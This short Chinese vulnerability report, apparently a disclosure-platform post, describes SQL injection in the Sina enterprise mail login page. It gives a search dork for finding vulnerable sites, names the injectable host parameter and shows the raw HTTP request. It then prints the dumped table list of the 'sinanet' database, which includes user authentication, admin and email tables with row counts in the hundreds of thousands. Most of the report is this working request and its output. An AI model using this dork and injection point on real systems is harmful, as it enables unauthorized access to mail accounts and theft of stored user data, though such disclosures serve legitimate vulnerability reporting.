RT
登陆页 intext:新浪企业邮箱 一切由你开始
案例
http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ ......
参数host存在注入
以http://**.**.**.**/为例
GET / HTTP/1.1 Host: **.**.**.** Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4,ko;q=0.2,ja;q=0.2 Cookie: Email=usrmdinst_0
Database: sinanet +-------------------+---------+ | Table | Entries | +-------------------+---------+ | pop_mail_recovery | 2123484 | | maillistmember | 283314 | | email | 280634 | | userauth | 280633 | | userauth_log | 80729 | | SNSTORE | 48563 | | `domain` | 41556 | | department | 36993 | | admin | 24113 | | enterprise | 22700 | | maillistprev | 20215 | | CONSUME | 14352 | | businesscard | 10000 |